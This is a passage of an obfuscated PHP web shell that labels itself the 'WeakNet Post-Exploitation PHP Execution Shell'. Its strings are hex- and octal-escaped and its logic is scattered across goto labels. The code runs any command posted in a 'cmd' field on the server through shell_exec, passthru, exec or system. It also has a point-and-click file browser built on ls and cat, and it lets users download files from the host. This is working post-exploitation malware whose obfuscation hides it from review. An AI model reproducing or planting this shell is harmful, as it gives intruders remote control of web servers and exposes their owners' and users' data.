x20\x74\x6f\40\166\145\x72\164\151\x63\x61\x6c\x6c\171\x20\143\145\156\x74\145\x72\40\164\150\145\40\x63\150\x69\x6c\144\x2c\x20\x74\151\164\154\145\x43\x65\x6e\x74\145\162\x20\x2a\x2f\xa\11\11\144\x69\163\160\154\141\171\72\x20\x74\x61\142\154\x65\55\143\x65\x6c\154\73\xa\x9\11\166\x65\162\x74\151\143\141\154\x2d\141\154\x69\x67\x6e\72\x20\155\x69\x64\144\x6c\x65\73\xa\11\11\x70\141\144\x64\x69\x6e\147\72\61\60\160\170\40\x30\160\x78\x20\x31\x30\160\x78\40\61\60\x70\x78\73\12\x9\175\xa\x9\56\164\x69\x74\154\x65\103\x65\x6e\x74\x65\x72\173\40\x2f\x2a\x20\x76\x65\162\x74\151\x63\x61\154\154\171\x20\143\145\x6e\164\x65\162\145\x64\x20\x69\x6e\x20\155\x69\144\x64\154\145\40\157\x66\40\x22\56\164\151\x74\x6c\145\x22\x20\x2a\57\xa\x9\x9\x68\145\151\147\x68\164\x3a\x32\65\x70\x78\73\xa\11\x9\155\141\x72\x67\151\x6e\x3a\141\165\164\x6f\73\xa\x9\x9\x64\151\x73\160\x6c\141\171\72\x20\x69\x6e\154\151\156\145\x2d\142\x6c\x6f\143\153\73\xa\11\x7d\12\x9\56\x6f\x75\x74\x70\165\x74\x7b\x20\x2f\x2a\40\143\157\155\x6d\141\x6e\x64\40\x6f\165\164\x70\165\x74\40\x62\157\x78\x20\x77\x69\x74\x68\x20\x73\143\157\154\154\x65\x64\40\x6f\x76\145\162\154\x66\x6f\167\40\52\x2f\12\x9\x9\146\157\156\x74\55\x66\x61\155\x69\x6c\x79\72\x20\x6d\157\x6e\157\163\x70\141\143\145\73\12\11\x9\x66\x6f\156\164\55\163\x69\x7a\145\72\x31\x34\x70\x78\73\xa\11\x9\x6d\141\162\x67\x69\x6e\x3a\x37\60\160\170\40\x30\x70\170\40\60\x70\x78\x20\x30\x70\x78\73\12\11\11\157\x76\145\162\146\x6c\157\167\x3a\163\143\162\x6f\154\x6c\145\144\x3b\xa\11\x9\160\141\144\144\x69\x6e\147\72\x20\65\160\x78\x20\x35\x70\170\x20\61\65\60\160\170\40\x35\x70\170\73\40\57\x2a\x20\x74\x6f\40\163\150\157\167\40\x63\157\x6d\155\x61\x6e\x64\x20\x6f\x75\164\160\x75\x74\x20\142\145\x68\x69\x6e\x64\x20\x74\150\145\x20\x69\x6e\160\165\x74\x43\115\x44\40\142\x61\162\x20\x2a\57\12\x9\11\x63\x6f\154\x6f\162\x3a\43\x63\143\x63\x3b\xa\11\x9\142\141\x63\x6b\147\x72\157\x75\x6e\144\x2d\x63\x6f\154\157\162\72\x23\65\x36\x35\66\65\x36\x3b\12\x9\x9\167\151\x64\x74\x68\72\67\64\45\x3b\xa\11\175\xa\11\56\x75\156\151\x63\x6f\144\145\173\x20\57\52\x20\x64\x69\x73\x70\154\x61\x79\x20\x61\x20\x70\x6f\151\156\164\x65\x72\40\157\156\x20\150\157\166\x65\x72\40\x2a\x2f\xa\11\x9\x63\165\x72\x73\157\162\x3a\160\157\151\156\164\145\162\73\12\11\x7d\xa\11\56\x73\145\162\166\145\162\x49\x6e\146\157\173\40\x2f\x2a\40\146\x6f\162\x20\x73\x6d\x61\x6c\154\40\x62\157\170\x20\x6f\x6e\40\164\157\160\x20\162\151\147\x68\164\40\146\x6f\x72\40\163\x65\162\x76\x65\162\40\x69\156\146\157\x72\x6d\141\x74\x69\x6f\156\x20\52\x2f\12\x9\11\142\x6f\162\144\x65\162\72\x32\160\170\x20\163\x6f\x6c\x69\144\x20\43\x36\x36\66\x3b\xa\x9\x9\x70\157\x73\151\164\151\x6f\x6e\72\146\151\170\x65\x64\73\xa\x9\x9\x74\157\160\x3a\x31\x30\x70\170\73\12\11\x9\162\151\147\x68\x74\x3a\61\60\160\x78\73\xa\x9\11\172\55\151\156\144\x65\x78\x3a\61\x33\x33\67\x3b\12\x9\x9\x62\x61\143\x6b\147\x72\x6f\x75\156\x64\x3a\43\x32\145\62\x65\62\145\73\xa\11\11\143\x6f\154\x6f\x72\72\x23\x37\62\x39\x66\143\x66\73\12\x9\11\160\141\x64\144\x69\156\147\72\65\x70\x78\73\xa\x9\11\146\x6f\x6e\x74\x2d\163\x69\172\x65\72\x31\64\160\x78\73\12\x9\175\12\11\56\x62\162\x61\156\144\151\156\x67\173\40\x2f\52\x20\x66\157\x72\40\141\x20\x6c\x69\156\153\x20\x74\x6f\x20\x74\150\x65\x20\107\151\x74\110\125\x42\40\160\141\x67\x65\40\52\x2f\xa\11\11\x66\154\x6f\141\164\x3a\162\x69\147\150\164\73\xa\11\11\146\x6f\x6e\x74\55\163\151\x7a\145\72\x31\x35\x70\x78\73\12\11\x9\155\141\x72\x67\x69\156\55\162\151\147\x68\x74\72\62\x30\160\170\x3b\12\11\x9\x68\x65\x69\147\150\164\72\x34\60\x70\170\x3b\x20\x2f\52\40\x62\145\x63\141\x75\x73\145\x20\x6f\x66\x20\160\141\x64\144\151\156\x67\40\x74\x2c\142\x20\157\x66\40\x69\156\x70\x75\x74\103\x4d\104\40\52\x2f\12\x9\175\12\11\x61\x7b\x20\x2f\52\x20\167\x68\x79\40\x63\x61\156\47\164\x20\x74\150\x69\163\40\142\x65\40\x6e\157\x6e\x20\x68\151\144\x65\x6f\165\x73\x20\142\x79\x20\x64\145\x66\141\165\154\x74\77\x20\x2a\57\xa\x9\11\164\145\x78\x74\x2d\x64\145\x63\157\162\141\164\151\157\156\x3a\x6e\157\x6e\145\x3b\xa\x9\x9\x63\x6f\x6c\x6f\162\72\43\67\x32\x39\146\x63\x66\x3b\xa\11\175\xa\x9\141\72\x68\157\x76\145\x72\173\xa\11\x9\x74\x65\x78\164\55\x64\145\143\157\x72\x61\x74\x69\157\x6e\72\165\156\x64\145\x72\x6c\151\x6e\x65\73\40\57\x2a\x20\x74\157\x20\x64\x69\x66\x66\145\162\145\x6e\164\151\141\x74\145\x2c\x20\x69\40\147\165\145\163\163\x20\x2a\57\12\11\175\xa\x9\142\165\x74\x74\x6f\156\x7b\12\x9\11\x6d\x61\162\x67\151\156\72\65\160\170\40\60\160\x78\x20\x30\x70\x78\40\61\x30\x70\170\73\12\x9\x9\143\157\154\157\162\72\43\x37\62\x39\x66\143\x66\x3b\xa\11\11\160\x61\144\x64\151\x6e\147\72\61\x30\x70\170\73\xa\11\x9\x62\141\x63\153\147\x72\x6f\165\x6e\144\55\x63\x6f\154\157\x72\72\x23\x33\65\x33\65\63\x35\73\xa\11\11\142\x6f\162\x64\145\162\x3a\x32\x70\170\x20\163\157\154\151\144\x20\43\x32\x65\x32\145\x32\145\x3b\xa\11\11\146\154\157\141\x74\x3a\x6c\x65\x66\164\x3b\12\x9\11\164\x72\x61\x6e\163\151\164\x69\157\156\x2d\x70\x72\157\x70\145\162\x74\171\x3a\x20\142\x61\x63\153\x67\x72\157\165\x6e\x64\x2d\143\157\154\157\x72\x3b\12\11\11\x74\162\x61\x6e\163\x69\x74\151\x6f\x6e\55\x64\165\162\x61\164\x69\157\156\x3a\40\x32\x73\73\12\11\x7d\xa\x9\x62\165\x74\164\157\x6e\72\150\157\x76\145\x72\x7b\xa\x9\x9\142\x61\143\x6b\x67\x72\x6f\x75\156\x64\x2d\143\157\x6c\x6f\162\x3a\43\x35\x34\x35\64\65\x34\x3b\12\11\175\xa\11\x2f\x2a\x20\x74\x68\145\163\x65\40\x61\162\x65\x20\146\157\162\x20\x73\x74\171\154\151\156\x67\40\164\150\145\x20\x74\x62\x61\x6c\145\x20\x6f\x75\x74\160\165\164\x20\157\x66\40\164\x68\145\40\x2e\x73\145\x72\166\145\x72\111\156\146\157\x20\x62\x6f\170\x3a\x20\x2a\x2f\xa\11\164\x72\x3a\x6e\x74\150\55\x63\150\x69\154\x64\x28\145\x76\x65\156\x29\40\x7b\142\141\x63\x6b\147\162\157\x75\156\x64\72\40\43\62\60\62\60\x32\60\x7d\xa\11\164\x72\x3a\156\164\x68\55\x63\x68\x69\x6c\144\x28\157\144\x64\51\40\173\x62\x61\x63\x6b\x67\162\x6f\x75\156\x64\72\40\43\x33\x34\63\64\63\x34\175\12\11\164\x64\x7b\40\x70\141\x64\144\151\x6e\147\72\63\160\x78\73\x7d\12\74\x2f\x73\x74\x79\x6c\145\76\xa\74\x73\x63\x72\x69\160\x74\76\xa\x9\x2f\57\40\x66\157\162\40\x64\171\x6e\141\x6d\151\x63\141\154\154\x79\x20\x67\145\156\145\x72\141\x74\x69\156\147\x20\156\x61\166\151\x67\141\164\151\157\156\40\x66\x72\x6f\155\40\157\x75\x74\160\165\x74\xa\11\146\165\156\x63\164\x69\x6f\156\x20\163\x75\x62\x6d\151\164\x46\x69\154\x65\50\160\141\164\x68\54\x66\151\x6c\x65\x2c\x61\x63\x74\151\x6f\156\x29\x7b\12\11\11\x69\146\x28\x61\143\164\151\x6f\x6e\40\x3d\x3d\40\x22\x63\141\x74\x22\51\173\xa\x9\11\11\x64\157\x63\165\155\x65\x6e\164\x2e\147\x65\164\x45\154\x65\x6d\x65\156\x74\102\x79\x49\144\x28\42\151\x6e\160\165\x74\x43\155\144\42\51\x2e\x76\x61\x6c\165\145\x3d\x27\x63\141\x74\40\x27\40\x2b\40\160\141\164\150\40\x2b\x20\146\x69\154\x65\x3b\x20\57\57\x20\x54\x4f\104\117\40\x63\x68\x61\156\147\145\40\x74\157\x20\x77\x68\151\x6c\145\40\x72\145\x61\144\x20\146\x6f\157\40\x64\x6f\40\145\143\150\157\40\x66\157\157\12\x9\11\x7d\x65\x6c\x73\145\40\x69\146\x28\x61\x63\x74\x69\157\156\40\75\75\x20\x22\x6c\x73\x22\51\173\xa\x9\x9\x9\x64\x6f\143\165\x6d\145\x6e\x74\56\147\x65\x74\x45\x6c\145\155\145\156\x74\102\x79\111\x64\x28\x22\x69\x6e\x70\165\164\x43\x6d\x64\x22\x29\x2e\x76\141\x6c\165\x65\75\x27\x6c\163\40\x2d\x6c\x20\47\40\x2b\40\x70\141\164\150\40\53\x20\x66\151\x6c\145\x3b\x20\x2f\57\40\x54\117\104\x4f\x20\143\150\x61\156\x67\145\40\164\157\x20\167\150\151\x6c\x65\40\162\x65\141\x64\x20\x66\157\157\40\x64\x6f\x20\145\143\x68\157\x20\x66\157\x6f\xa\11\x9\175\12\x9\x9\x64\x6f\x63\165\x6d\145\x6e\x74\56\x67\145\164\x45\x6c\x65\155\x65\156\164\x42\171\111\144\x28\x22\163\165\142\155\151\164\103\155\x64\42\x29\56\x73\165\x62\x6d\151\x74\50\51\73\40\x2f\x2f\40\x73\x75\142\155\x69\164\40\x74\x68\x65\40\162\145\x71\x75\145\163\x74\12\11\x7d\xa\11\x66\x75\x6e\143\x74\x69\157\x6e\40\x65\170\145\x63\x54\171\x70\145\50\x74\x79\x70\x65\x29\173\xa\x9\x9\x64\x6f\x63\165\155\145\x6e\164\x2e\x67\x65\x74\105\154\x65\x6d\x65\x6e\164\x42\171\x49\144\50\47\145\x78\145\x63\x54\171\x70\x65\x27\x29\x2e\166\x61\x6c\x75\145\x3d\164\171\160\145\73\x20\57\x2f\x20\x4a\x75\163\164\40\x73\x65\164\x20\x74\150\x65\40\164\171\160\x65\x20\150\145\162\x65\x20\x61\156\x64\40\164\150\x65\40\120\x48\x50\x20\120\x4f\123\124\x20\x77\x69\154\x6c\x20\160\151\x63\153\40\151\164\x20\165\160\12\11\x7d\xa\x3c\57\x73\143\x72\151\x70\x74\76\12\74\x2f\x68\145\x61\x64\76\xa\x3c\x62\157\144\171\76\12"; goto QddJu; cAdxa: echo "\11\x9\x9\x74\171\160\x65\x3d\42\x72\141\x64\151\x6f\x22\40\x6e\x61\155\x65\x3d\42\145\170\145\143\124\x79\x70\145\x22\x20\166\x61\x6c\x75\x65\x3d\x22\x70\x61\x73\163\164\x68\x72\x75\42\x20\57\x3e\xa\11\11\x3c\x61\40\x68\x72\145\146\75\42\x68\x74\164\x70\x3a\57\x2f\160\x68\x70\x2e\156\x65\164\x2f\155\x61\x6e\165\141\154\x2f\x65\x6e\x2f\146\165\x6e\143\x74\151\x6f\x6e\x2e\163\x68\x65\154\154\x2d\145\170\x65\143\56\160\x68\160\x22\x3e\x73\150\145\x6c\x6c\137\145\170\x65\x63\50\x29\74\x2f\141\76\74\151\156\x70\x75\x74\x20\157\156\x43\x6c\151\143\153\x3d\42\145\x78\145\x63\124\171\x70\145\x28\x27\x73\x68\x65\154\x6c\137\145\170\145\x63\47\x29\x22\x20"; goto ec1DQ; lVpNu: QMN8g: goto gy19t; sOtUh: echo "\11\x9\x3c\x2f\164\144\74\x2f\164\x72\x3e\12\11\11"; goto O2MOk; TcygK: echo "\x9\x9\11\164\171\x70\145\75\42\x72\141\144\151\x6f\42\x20\156\141\x6d\145\75\x22\x65\170\145\143\124\x79\x70\x65\x22\40\166\x61\x6c\x75\145\x3d\42\163\x68\145\154\x6c\x5f\145\170\x65\143\42\x20\x2f\x3e\x3c\142\162\x20\x2f\76\12\11\x3c\146\x6f\162\155\x20\x61\x63\164\151\157\156\x3d\42\43\42\40\x6d\145\164\150\x6f\144\75\x22\x70\157\163\x74\x22\x20\156\x61\x6d\x65\75\42\163\165\x62\x6d\151\164\103\155\144\42\40\151\x64\x3d\x22\163\165\x62\x6d\151\x74\x43\155\x64\x22\x3e\x3c\41\55\x2d\x20\x6e\157\40\142\165\164\x74\157\156\x20\150\145\x72\x65\54\40\152\165\163\164\x20\x68\x69\x74\x20\145\x6e\164\145\162\40\55\55\x3e\xa\x9\11\74\151\x6e\160\x75\x74\40\151\144\x3d\x22\151\156\x70\x75\x74\x43\155\x64\42\x20\164\171\x70\x65\75\42\164\x65\x78\164\x22\x20\x73\x69\x7a\145\75\42\x35\65\x22\x20\160\154\141\x63\x65\x68\x6f\x6c\144\145\x72\75\x22\x54\171\x70\145\40\x63\x6f\x6d\155\141\x6e\x64\40\150\145\162\x65\40\164\x6f\x20\145\x78\145\x63\165\164\145\x20\157\x6e\x20\x68\x6f\x73\164\x20\x61\x6e\x64\x20\150\x69\x74\40\162\145\x74\165\162\x6e\42\x20\156\x61\x6d\x65\75\42\x63\155\x64\x22\57\x3e\xa\x9\11\74\151\x6e\160\x75\x74\40\164\x79\x70\145\75\x22\150\x69\x64\x64\145\156\42\40\166\141\x6c\x75\x65\75\42"; goto i3QgK; Y8P3y: readfile($rFjMr); goto KK4ov; Z6EU2: header("\x43\157\156\164\145\156\164\x2d\104\x65\x73\143\x72\x69\160\x74\x69\x6f\156\72\40\106\151\154\145\40\124\162\x61\x6e\x73\x66\145\x72"); goto lI0eE; Erfr3: echo "\143\150\145\x63\153\145\144"; goto rYPDe; H_Z0D: xD1fF: goto UDiKn; B9NPY: echo "\143\x68\x65\x63\x6b\x65\x64"; goto GwPPJ; Ch1mI: E9_2n: goto UusmY; M_jKD: n2MX8: goto SmhME; ExDHw: goto zbYxG; goto XtXaw; ec1DQ: if (!$_POST["\145\170\145\143\124\171\160\x65"]) { goto mOSkw; } goto dpsra; VnmpW: zaEtt: goto Ch1mI; EODje: if (!file_exists($rFjMr)) { goto H1oOv; } goto Z6EU2; AL7kn: LDSLB: goto Tz9yr; biZOl: passthru("{$QnnlO}\40\x32\x3e\57\x64\145\x76\x2f\163\x74\144\x6f\x75\164", $pi11W); goto clRxb; Urfp9: mOSkw: goto TcygK; ECltG: header("\105\x78\x70\x69\162\x65\x73\72\x20\60"); goto S6AAl; j1NhP: echo "\x63\150\x65\x63\153\145\x64"; goto KqHlb; QddJu: if (!$_POST["\143\155\144"]) { goto C84rx; } goto V6oNr; TiaAF: echo "\x20\12\x9\x9\x9\156\141\155\x65\75\42\145\x78\x65\x63\124\171\160\145\42\40\x76\141\154\165\145\x3d\42\x65\170\x65\143\x22\40\x6f\156\x43\x6c\151\143\153\x3d\42\x65\170\x65\143\124\x79\160\145\50\x27\x65\170\x65\x63\47\51\42\57\76\40\xa\11\x9\74\x61\x20\x68\162\x65\x66\x3d\42\x68\x74\164\160\72\57\x2f\x70\150\160\x2e\x6e\145\x74\57\x6d\x61\156\x75\x61\x6c\x2f\145\x6e\57\x66\x75\156\x63\x74\x69\x6f\x6e\56\x73\x79\x73\x74\145\x6d\56\160\x68\160\42\x3e\163\171\x73\164\x65\155\x28\x29\74\57\x61\76\x3c\151\156\x70\165\164\40\x6f\156\x43\x6c\x69\x63\153\x3d\x22\x65\170\145\143\124\x79\160\x65\x28\47\x73\x79\x73\x74\145\155\47\x29\42\x20"; goto n03ZB; dpsra: if (!($_POST["\x65\170\145\x63\124\171\160\x65"] == "\163\x68\x65\x6c\154\x5f\145\x78\145\x63")) { goto WlJk8; } goto Erfr3; EETse: CmKEN: goto x2BXK; RM3nE: $dXr9q = preg_replace("\57\x28\134\50\174\x5c\51\x7c\44\174\47\x29\x2f", "\x24\x31", $pMBo9); goto C2hO0; JH8Pc: echo "\x3c\141\x20\x74\141\162\x67\x65\x74\75\x22\x62\154\141\x6e\153\42\40\150\x72\145\146\x3d\42\150\164\164\160\163\72\57\x2f\x77\167\x77\56\x67\x6f\157\147\154\x65\x2e\143\x6f\155\x2f\x3f\147\x77\x73\x5f\x72\144\x3d\x73\x73\154\43\x71\x3d\x73\x69\x74\x65\x3a" . $_SERVER["\x53\x45\x52\x56\105\x52\137\116\101\x4d\105"] . "\42\x3e" . $_SERVER["\x53\105\x52\x56\x45\122\137\116\101\x4d\105"] . "\x3c\57\141\76"; goto nJzJB; pzUzt: foreach (array_slice($pi11W, 1, count($pi11W)) as $T8ybf) { goto xQ9kO; to1R0: $T8ybf = preg_replace("\57\x3c\x2f", "\46\154\164\73", $T8ybf); goto pMlT5; GTuS6: if (preg_match("\x2f\x5e\x6c\x73\40\x2d\154\x5c\x73\57", "{$QnnlO}")) { goto Z3old; } goto u3Bxs; pMlT5: $T8ybf = preg_replace("\x2f\134\x73\x2f", "\x26\156\142\x73\x70\73", $T8ybf); goto GTuS6; k4o0N: echo "\x3c\x73\x70\141\156\40\x73\164\x79\154\145\75\x22\x63\157\x6c\x6f\x72\72\x23\x30\x30\x63\x65\x30\x35\42\x20\x74\x69\x74\x6c\x65\75\42\x43\154\x69\143\153\x20\x68\x65\162\x65\x20\164\157\x20\x76\151\x65\x77\40\144\x69\162\145\143\x74\x6f\162\x79\x20\143\x6f\156\x74\x65\x6e\x74\163\42\x20\x63\x6c\x61\x73\163\75\42\x75\x6e\x69\x63\157\x64\x65\42\40\157\156\x43\x6c\x69\x63\x6b\75\42\163\165\x62\x6d\151\164\x46\x69\x6c\x65\50\47{$jNBbj}\x27\x2c\47{$ZpVfW}\x27\x2c\47\154\x73\47\x29\x3b\42\x3e\46\x23\61\62\x38\62\66\x39\x3b\x3c\x2f\163\x70\x61\156\x3e\46\x6e\142\x73\160\73" . $T8ybf . "\x3c\142\x72\40\x2f\76"; goto D4vjX; cKTFl: W72eX: goto O6U9o; TYNWI: qkmbT: goto XF7Ae; XF7Ae: $T8ybf = preg_replace("\x2f\x26\x2f", "\46\x61\155\160\x3b", $T8ybf); goto to1R0; O6U9o: Tp8gw: goto BI4DS; iHRGl: if (!preg_match("\x2f\136\144\57", "{$T8ybf}")) { goto wPRjX; } goto k4o0N; D4vjX: goto W72eX; goto tNgrZ; tNgrZ: wPRjX: goto yQnLf; vHeLE: $ZpVfW = array_pop($ujY8P); goto fzi_c; ze59l: goto Tp8gw; goto oBlHp; uCfCl: if (preg_match("\57\x5c\57\x24\57", "{$jNBbj}")) { goto qkmbT; } goto ye9E5; yQnLf: echo "\x3c\163\x70\x61\156\40\163\164\x79\x6c\145\75\42\x63\157\154\x6f\162\x3a\x79\145\154\x6c\x6f\167\42\x20\x74\x69\164\x6c\145\75\x22\x43\x6c\x69\143\x6b\40\x68\145\162\145\40\x76\151\x65\167\40\146\151\154\x65\40\143\x6f\156\x74\x65\x6e\164\x73\42\40\x63\x6c\141\163\163\x3d\x22\x75\156\x69\x63\x6f\144\x65\42\x20\157\156\103\x6c\x69\143\153\75\x22\x73\x75\x62\x6d\151\164\x46\151\x6c\145\50\x27{$jNBbj}\x27\54\47{$ZpVfW}\x27\54\47\143\x61\x74\47\x29\73\x22\76\x26\x23\61\62\x38\x30\x34\x39\x3b\74\x2f\163\x70\x61\156\x3e\46\156\142\x73\x70\x3b" . $T8ybf . "\74\142\x72\40\x2f\76"; goto cKTFl; T0POK: $ujY8P = explode("\40", $T8ybf); goto vHeLE; u3Bxs: echo $T8ybf . "\x3c\142\162\x20\57\76"; goto ze59l; xQ9kO: $pMBo9 = implode("\134\156", $pi11W); goto T0POK; fzi_c: $jNBbj = preg_replace("\57\56\52\x5c\163\50\133\x5e\40\x5d\x2b\x29\x24\x2f", "\44\61", "{$QnnlO}"); goto uCfCl; oBlHp: Z3old: goto iHRGl; BI4DS: jIbdj: goto dGPsF; ye9E5: $jNBbj .= "\57"; goto TYNWI; dGPsF: } goto VnmpW; AEkdA: if (!$_POST["\x64\x6f\x77\156\154\x6f\141\144\x46\151\154\x65"]) { goto XrhVR; } goto N_3_Y; wfLmF: XrhVR: goto RAqjQ; XpFkA: goto i82iw; goto lVpNu; iY6iB: zbYxG: goto O_77E; jxKjS: goto i82iw; goto N7Aqj; I1bTj: echo "\x63\150\145\143\153\x65\x64"; goto AL7kn; UDiKn: $pi11W = shell_exec("{$QnnlO}\40\x32\76\x2f\x64\145\166\57\163\x74\x64\157\165\164"); goto UUn8s; Ddd38: if (!($_POST["\x65\x78\145\x63\x54\x79\x70\x65"] == "\145\170\x65\x63")) { goto LDSLB; } goto I1bTj; RAqjQ: echo "\74\57\144\x69\x76\76\12\74\41\x2d\x2d\40\124\150\145\x20\151\156\160\165\x74\40\x62\x6f\x78\x20\x61\x6e\144\40\x77\x68\157\x6c\145\40\142\x6f\x74\x74\157\x6d\x20\142\141\x72\40\x2d\x2d\x3e\12\74\144\151\166\40\143\154\x61\x73\x73\75\x22\x69\156\160\165\x74\103\x4d\104\x22\76\12\11\74\163\x74\162\x6f\x6e\x67\76\120\110\120\40\x45\x78\145\x63\x20\106\165\156\143\164\151\157\x6e\x3a\40\74\x2f\x73\164\162\157\x6e\x67\x3e\40\xa\x9\x9\x3c\141\40\150\162\x65\146\x3d\42\x68\164\164\x70\x3a\x2f\57\x70\150\x70\56\x6e\145\x74\x2f\x6d\x61\156\165\x61\154\57\x65\x6e\57\146\x75\156\x63\x74\x69\157\x6e\x2e\145\170\x65\143\56\160\x68\160\42\76\x65\170\145\143\x28\51\74\57\x61\x3e\74\151\156\160\x75\164\40\x74\171\160\x65\x3d\x22\x72\141\144\x69\x6f\42\x20"; goto Xb172; k8Hx2: header("\x43\157\x6e\x74\x65\x6e\164\55\x4c\145\x6e\147\x74\x68\x3a\x20" . filesize($rFjMr)); goto Y8P3y; Cnum_: $QnnlO = "\50\x6e\157\156\x65\51\40\x50\154\x65\141\x73\145\x20\x74\x79\160\145\40\x61\x20\143\x6f\x6d\155\141\x6e\x64\40\x74\157\x20\145\x78\145\x63\x75\x74\x65\x20\x62\x65\x6c\157\167"; goto LM1ys; i3QgK: if ($_POST["\145\x78\145\143\124\x79\x70\x65"] != '') { goto CmKEN; } goto FdY5M; sfOdL: LzD_v: goto wfLmF; JUPCK: echo "\74\x2f\164\144\74\57\164\162\x3e\xa\x9\x9\x3c\x74\x72\x3e\x3c\x74\144\76\x41\144\x6d\x69\156\x3c\x2f\164\144\76\74\164\144\76"; goto Zw4jE; O_77E: echo "\x3c\x64\151\166\x20\x63\154\141\x73\163\75\x22\164\151\164\154\145\102\141\x72\42\x3e\74\x64\151\x76\40\x63\x6c\141\x73\163\75\42\164\151\164\x6c\145\x22\76\74\144\x69\x76\40\x63\154\x61\163\163\75\42\164\x69\x74\x6c\145\103\x65\x6e\x74\x65\x72\x22\x3e\74\x73\160\x61\x6e\x20\163\x74\171\x6c\145\75\42\x66\157\156\x74\55\163\151\172\145\72\63\x35\160\170\x3b\x22\x3e\x26\x23\x31\62\x38\60\62\x36\73\40\127\120\x45\x53\74\57\163\x70\141\x6e\x3e\x20\104\x69\x73\x70\154\x61\171\151\156\x67\40\x72\x65\163\x75\154\164\163\40\x66\157\x72\x20\x63\157\x6d\x6d\x61\x6e\144\x3a\x20" . "\x20\74\163\160\x61\156\40\x63\x6c\x61\x73\163\x3d\x22\143\x6d\144\x54\x69\164\x6c\145\42\76" . $QnnlO . "\74\57\x73\160\141\x6e\76\74\57\144\151\166\76\74\57\144\151\166\76\74\57\144\151\166\x3e"; goto Rhfd0; LM1ys: $T8ybf = "\127\x65\x61\153\116\145\164\x20\120\x6f\163\164\x2d\105\x78\x70\x6c\157\x69\164\141\164\151\x6f\156\40\120\110\120\40\x45\x78\x65\x63\165\164\x69\157\156\x20\123\150\145\x6c\154\40\x69\163\40\x66\x72\145\145\x2c\x20\x72\x65\144\151\163\x74\x72\151\x62\165\164\141\x62\154\145\x20\163\157\146\164\x77\x61\x72\x65\x2e\x20\x49\164\40\x68\x61\x73\40\156\157\40\167\141\x72\x72\x61\x6e\x74\x79\40\x66\x6f\x72\40\x74\x68\145\40\x70\162\157\x67\x72\141\155\54\x20" . "\x74\x6f\40\164\150\145\40\x65\x78\x74\145\156\x74\x20\160\x65\162\x6d\151\164\x74\x65\x64\x20\x62\171\x20\x61\x70\160\x6c\151\143\141\142\x6c\145\x20\154\x61\x77\x2e\x20\x57\x65\141\153\x4e\145\164\40\114\x61\x62\x6f\x72\x61\164\157\x72\151\145\x73\40\151\163\x20\x6e\157\x20\x6c\x69\x61\142\x6c\x65\40\x74\x6f\x20\x79\157\165\x20\146\157\x72\x20\x64\141\x6d\x61\147\x65\163\x2c\40\151\156\143\154\165\x64\x69\x6e\x67\40\141\156\171\x20\x67\x65\156\145\162\x61\154\54" . "\40\x73\x70\x65\143\151\141\x6c\x2c\40\x69\156\143\x69\144\x65\x6e\x74\x61\x6c\40\x6f\x72\40\x63\x6f\156\163\145\x71\165\x65\x6e\164\x69\141\154\40\x64\141\x6d\141\x67\145\x73\x20\141\x72\151\x73\x69\156\x67\40\x6f\x75\x74\40\157\x66\40\164\x68\145\40\x75\163\145\40\x6f\162\x20\x69\x6e\141\x62\x69\154\151\164\x79\x20\x74\157\40\165\163\x65\40\164\x68\145\40\160\x72\157\x67\x72\x61\x6d\x2e\x20\x3c\142\162\40\x2f\76\x3c\x62\162\x20\x2f\76\124\x68\x69\163" . "\40\x70\162\x6f\x67\162\x61\x6d\x20\163\x68\157\165\x6c\x64\x20\157\156\154\x79\x20\142\x65\x20\x75\163\145\x64\x20\157\x6e\x20\163\171\163\x74\x65\x6d\163\40\x74\x68\x61\164\40\x74\150\x65\40\x70\145\156\x65\x74\162\x61\x74\151\x6f\x6e\x20\x74\x65\163\x74\145\x72\40\x68\x61\163\x20\160\145\x72\x6d\151\x73\163\151\x6f\x6e\x20\x74\157\x20\165\x73\x65\40\157\x72\x20\x6f\167\x6e\163\x2e" . "\x3c\142\162\x20\57\x3e\74\x62\162\40\x2f\76\124\157\40\142\x65\147\151\x6e\54\40\160\154\145\141\163\145\x20\x74\171\x70\145\x20\x61\40\143\157\155\x6d\141\x6e\144\40\142\145\x6c\x6f\167\x2e\40\106\157\x72\x20\150\x65\154\x70\x20\x70\x6c\145\141\163\145\x20\162\x65\x66\145\162\40\x74\157\x20\164\x68\145\x20\107\x69\164\x48\125\x42\x20\x52\x65\x61\x64\155\x65\x2e\155\144\40\146\x69\x6c\x65\40\142\x79\x20\143\154\151\143\x6b\151\x6e\147\40\x6f\156\x20\x74\x68\x65" . "\x20\x6c\x69\x6e\153\x20\x6f\x6e\x20\164\150\x65\x20\x62\157\164\164\157\155\x20\x6c\x65\146\164\56\40\x54\150\x61\x6e\153\40\x79\157\165\40\146\x6f\x72\40\143\150\157\157\163\x69\x6e\147\x20\127\x65\x61\x6b\x4e\x65\164\40\114\x61\x62\x73\41"; goto iY6iB; Xb172: if (!$_POST["\x65\x78\145\x63\x54\171\160\145"]) { goto hMMqe; } goto Ddd38; N7Aqj: wK4_Y: goto lEfk5; HX4rW: echo $_SERVER["\122\105\121\x55\105\123\x54\x5f\x54\x49\x4d\x45"]; goto JUPCK; Irmfz: echo "\40\12\x9\x9\11\x74\171\x70\x65\x3d\x22\x72\x61\144\x69\157\x22\x20\x6e\141\x6d\x65\x3d\42\x65\x78\x65\143\x54\171\x70\145\x22\x20\166\x61\x6c\165\x65\75\42\x73\171\163\x74\145\155\x22\40\x2f\76\40\xa\x9\x9\x3c\141\x20\150\162\145\x66\75\x22\150\164\164\x70\x3a\x2f\57\160\x68\160\56\x6e\145\x74\57\x6d\x61\x6e\x75\x61\x6c\x2f\145\x6e\57\146\165\x6e\x63\x74\x69\x6f\x6e\x2e\160\x61\163\163\164\150\x72\165\56\160\x68\160\x22\76\160\x61\163\163\x74\x68\162\165\x28\x29\74\57\x61\76\74\x69\156\160\x75\164\40\157\x6e\x43\x6c\151\x63\x6b\75\x22\145\x78\145\143\x54\x79\160\x65\x28\x27\160\x61\x73\163\x74\x68\162\x75\x27\x29\x22\40"; goto AarRu; GwPPJ: DHsNG: goto CuUZ2; sqayN: echo "\x63\x68\145\x63\x6b\145\x64"; goto Ktdz5; ii57X: echo "\74\57\164\144\x3c\57\x74\x72\x3e\xa\11\x9\x3c\x74\x72\76\74\164\x64\76\124\151\155\x65\163\164\x61\x6d\x70\74\57\x74\x64\76\74\x74\144\x3e"; goto HX4rW; rYPDe: WlJk8: goto Urfp9; Tz9yr: goto InIpx; goto CwJ8v; FdY5M: echo "\145\170\145\x63"; goto leSe2; np0JY: echo 